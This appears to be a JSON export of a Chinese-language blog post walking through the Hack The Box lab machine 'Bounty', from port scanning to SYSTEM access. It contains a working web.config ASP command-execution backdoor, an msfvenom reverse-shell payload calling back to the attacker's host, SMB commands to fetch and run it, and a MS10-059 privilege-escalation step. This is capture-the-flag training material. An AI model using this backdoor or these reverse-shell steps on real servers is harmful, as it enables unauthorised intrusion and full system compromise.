{"id":181,"date":"2024-11-13T10:54:29","date_gmt":"2024-11-13T02:54:29","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=181"},"modified":"2024-11-13T10:54:30","modified_gmt":"2024-11-13T02:54:30","slug":"181","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/181\/","title":{"rendered":"HTB\u9776\u673a Bounty \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.93<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.10.93 (10.10.10.93) 56(84) bytes of data.\n64 bytes from 10.10.10.93: icmp_seq=1 ttl=127 time=98.2 ms\n64 bytes from 10.10.10.93: icmp_seq=2 ttl=127 time=95.8 ms\n64 bytes from 10.10.10.93: icmp_seq=3 ttl=127 time=102 ms\n64 bytes from 10.10.10.93: icmp_seq=4 ttl=127 time=95.1 ms\n\n--- 10.10.10.93 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3301ms\nrtt min\/avg\/max\/mdev = 95.105\/97.703\/101.655\/2.559 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Tue Oct  8 21:16:49 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.93\nNmap scan report for 10.10.10.93\nHost is up (0.10s latency).\nAll 65535 scanned ports on 10.10.10.93 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Tue Oct  8 21:17:55 2024 -- 1 IP address (1 host up) scanned in 66.75 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Oct  8 21:22:29 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_report.txt 10.10.10.93\nNmap scan report for 10.10.10.93\nHost is up (0.095s latency).\nNot shown: 65534 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    Microsoft IIS httpd 7.5\n|_http-title: Bounty\n| http-methods: \n|_  Potentially risky methods: TRACE\n|_http-server-header: Microsoft-IIS\/7.5\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone|specialized\nRunning (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)\nOS CPE: cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_8.1 cpe:\/o:microsoft:windows_vista::- cpe:\/o:microsoft:windows_vista::sp1\nAggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   94.98 ms 10.10.14.1\n2   95.66 ms 10.10.10.93\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Oct  8 21:23:40 2024 -- 1 IP address (1 host up) scanned in 70.36 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Oct  8 21:26:47 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_report.txt 10.10.10.93\nNmap scan report for 10.10.10.93\nHost is up (0.095s latency).\nAll 65535 scanned ports on 10.10.10.93 are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Tue Oct  8 21:27:54 2024 -- 1 IP address (1 host up) scanned in 67.34 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u5927\u81f4\u4e3aWindows Server 2008<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/bounty.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Wed Oct  9 08:38:36 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/bounty.htb\/ -x 400,403,404 -t 60 -e asp,aspx,js,html,txt,zip,tar.gz,pcap -w \/usr\/share\/wordlists\/dirb\/big.txt\n\n301   155B   http:\/\/bounty.htb\/aspnet_client    -> REDIRECTS TO: http:\/\/bounty.htb\/aspnet_client\/\n301   155B   http:\/\/bounty.htb\/uploadedfiles    -> REDIRECTS TO: http:\/\/bounty.htb\/uploadedfiles\/<\/code><\/pre>\n
\u53d1\u73b0\u76ee\u5f55\/uploadedfiles<\/code>\uff0c\u5c1d\u8bd5\u8bbf\u95ee\uff0c\u8fd4\u56de403<\/code>\u72b6\u6001\u7801\uff0c\u76f4\u63a5\u5bf9\u8be5\u76ee\u5f55\u8fdb\u884c\u626b\u63cf\uff0c\u4f46\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u5927\u5b57\u5178\u76ee\u5f55\u679a\u4e3e<\/h2>\n
\u9274\u4e8e\u4f7f\u7528\u5c0f\u578b\u76ee\u5f55\u540d\u5b57\u5178\u626b\u63cf\u65f6\u672a\u53d1\u73b0\u6709\u6548\u4fe1\u606f\uff0c\u76f4\u63a5\u4f7f\u7528\u5927\u578b\u5b57\u5178directory-list-2.3-medium.txt<\/code>\u8fdb\u884c\u76ee\u5f55\u679a\u4e3e\uff0c\u4e3b\u8981\u626b\u63cfasp<\/code>\u548caspx<\/code>\u6587\u4ef6\uff1a<\/p>\n
gobuster dir -u http:\/\/bounty.htb\/ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -t 70 -x asp,aspx -b 400,404<\/code><\/pre>\n
\"\"\u6210\u529f\u53d1\u73b0\u6587\u4ef6\u4e0a\u4f20\u9875\u9762\uff1a\/transfer.aspx<\/code>\uff01<\/p>\n
web.config\u6587\u4ef6\u4e0a\u4f20<\/h2>\n
\u8bbf\u95eetransfer.aspx<\/code>\u9875\u9762\uff1a<\/p>\n
\"\"<\/p>\n
\u5728\u672c\u5730\u6253\u5f00BurpSuite<\/code>\uff0c\u968f\u610f\u9009\u62e9\u4e00\u4e2a\u6587\u4ef6\uff0c\u70b9\u51fb\u4e0a\u4f20\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0txt<\/code>\u6587\u4ef6\u65e0\u6cd5\u4e0a\u4f20\u3002\u5c1d\u8bd5\u5c06\u540e\u7f00\u540d\u6539\u4e3aasp<\/code>\u3001aspx<\/code>\u7b49\uff0c\u5747\u4e0a\u4f20\u5931\u8d25\uff0c\u4f46\u662f\u53ef\u4ee5\u4e0a\u4f20png<\/code>\u3001jpg<\/code>\u7b49\u56fe\u7247\u6587\u4ef6\u3002\u4e0a\u4f20\u7684\u6587\u4ef6\u90fd\u4fdd\u5b58\u5728uploadedfiles<\/code>\u76ee\u5f55\u4e0b\uff0c\u4e14\u672a\u7ecf\u8fc7\u6539\u540d\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u5c06\u6587\u4ef6\u540d\u6539\u4e3atest.config<\/code>\u5e76\u4e0a\u4f20\u5230\u9776\u673a\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u53ef\u4ee5\u4e0a\u4f20<\/strong>**.config**<\/code>\u6587\u4ef6\uff01<\/strong><\/p>\n
\u63a5\u4e0b\u6765\u53ef\u4ee5\u4e0a\u4f20IIS<\/code>\u670d\u52a1\u5668\u914d\u7f6e\u6587\u4ef6web.config<\/code>\u3002\u901a\u8fc7\u8be5\u6587\u4ef6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4fee\u6539\u5f53\u524d\u76ee\u5f55\u4e0b\u7684\u8fd0\u884c\u914d\u7f6e\u548c\u57cb\u85cf\u540e\u95e8\u6728\u9a6c\u3002\u8fd9\u91cc\u76f4\u63a5\u4e0a\u4f20\u4e00\u4e2aWebConfig<\/code>\u547d\u4ee4\u6267\u884c\u540e\u95e8\uff0c\u8be5\u540e\u95e8\u901a\u8fc7\u52a0\u8f7d\u670d\u52a1\u5668asp.dll<\/code>\u52a8\u6001\u94fe\u63a5\u5e93\u6765\u6267\u884c\u4efb\u610fASP<\/code>\u4ee3\u7801\uff1a<\/p>\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n   <system.webServer>\n      <handlers accessPolicy=\"Read, Script, Write\">\n         <add name=\"web_config\" path=\"*.config\" verb=\"*\" modules=\"IsapiModule\" scriptProcessor=\"%windir%system32inetsrvasp.dll\" resourceType=\"Unspecified\" requireAccess=\"Write\" preCondition=\"bitness64\" \/>\n      <\/handlers>\n      <security>\n         <requestFiltering>\n            <fileExtensions>\n               <remove fileExtension=\".config\" \/>\n            <\/fileExtensions>\n            <hiddenSegments>\n               <remove segment=\"web.config\" \/>\n            <\/hiddenSegments>\n         <\/requestFiltering>\n      <\/security>\n   <\/system.webServer>\n<\/configuration>\n<!--\n<%\nResponse.Write(\"Hello, hello, I'm sparkle!<br><hr>\")\n\nFunction GetCommandOutput(command)\n    Set shell = CreateObject(\"WScript.Shell\")\n    Set exec = shell.Exec(command)\n    GetCommandOutput = exec.StdOut.ReadAll\nEnd Function\n\nResponse.Write(GetCommandOutput(\"cmd \/c \" + Request(\"cmd\")))\nResponse.Write(\"<!-\"&\"-\")\n%>\n--><\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u4e0a\u4f20\uff01\u63a5\u4e0b\u6765\u8bbf\u95eeWebConfig<\/code>\u540e\u95e8\uff1a``<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u540e\u95e8\u8fd0\u884c\u6b63\u5e38\u3002\u63a5\u4e0b\u6765\u5728\u672c\u5730\u751f\u6210MSF<\/code>\u540e\u95e8\u7a0b\u5e8f\uff0c\u5e76\u6253\u5f00SimpleHTTPServer<\/code>\u8fdb\u884c\u4e0b\u8f7d\uff0c\u968f\u540e\u5f00\u542fMetasploit<\/code>\u76d1\u542c\uff1a<\/p>\n
msfvenom -p windows\/x64\/powershell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o reverse.exe<\/code><\/pre>\n
\u51c6\u5907\u5b8c\u6bd5\u540e\u901a\u8fc7\u7f51\u9875\u6728\u9a6c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u4e0b\u8f7d\u6076\u610f\u7a0b\u5e8f\uff1a<\/p>\n
net use z: \\10.10.14.8pentest_notesbounty Asd310056 \/user:megumin\ncopy Z:reverse.exe C:UsersPublicreverse.exe\nC:UsersPublicreverse.exe<\/code><\/pre>\n
\"\"<\/p>\n
\u53cd\u5f39Shell\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u5185\u6838\u6f0f\u6d1e\u67e5\u8be2<\/h2>\n
\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u5c06systeminfo<\/code>\u547d\u4ee4\u8f93\u51fa\u4e0b\u8f7d\u5230\u672c\u5730\uff08\u5df2\u7ecf\u5efa\u7acbSMB<\/code>\u8fde\u63a5\uff09\uff1a<\/p>\n
systeminfo > Z:sysinfo.txt<\/code><\/pre>\n
\u968f\u540e\u4f7f\u7528Windows Exploit Suggester 2<\/code>\u5de5\u5177\u8fdb\u884c\u6f0f\u6d1e\u67e5\u8be2\uff0c\u53d1\u73b010<\/code>\u4e2a\u53ef\u80fd\u7684\u5185\u6838\u6f0f\u6d1e\uff1a<\/p>\n
\"\"<\/p>\n
\u51b3\u5b9a\u901a\u8fc7MS10-059<\/code>\u6f0f\u6d1e\u63d0\u6743\u3002<\/p>\n
MS10-059\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u5728GitHub<\/code>\u4e0a\u4e0b\u8f7dMS10-059<\/code>\u6f0f\u6d1e\u7684\u653b\u51fb\u7a0b\u5e8f\uff1awindows-kernel-exploits\/MS10-059\/MS10-059.exe at master \u00b7 SecWiki\/windows-kernel-exploits \u00b7 GitHub<\/a><\/p>\n
\"\"<\/p>\n
\u968f\u540e\u901a\u8fc7\u6253\u5f00\u7684SMB<\/code>\u8fde\u63a5\u5c06\u6587\u4ef6\u4f20\u8f93\u5230\u9776\u673a\u4e0a\uff0c\u5e76\u5728\u672c\u5730\u542f\u52a8\u76d1\u542c\uff0c\u6267\u884c\u8be5\u7a0b\u5e8f\uff1a<\/p>\n
copy Z:MS10-059.exe C:UsersPublicMS10-059.exe\n.MS10-059.exe 10.10.14.8 4444<\/code><\/pre>\n
\"\"<\/p>\n
\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
\n
Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
\"\"<\/p>\n
\n
\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
\n","protected":false},"excerpt":{"rendered":"
\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.93 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.93 (10.10.10.93)  …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-181","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=181"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/181\/revisions"}],"predecessor-version":[{"id":182,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/181\/revisions\/182"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}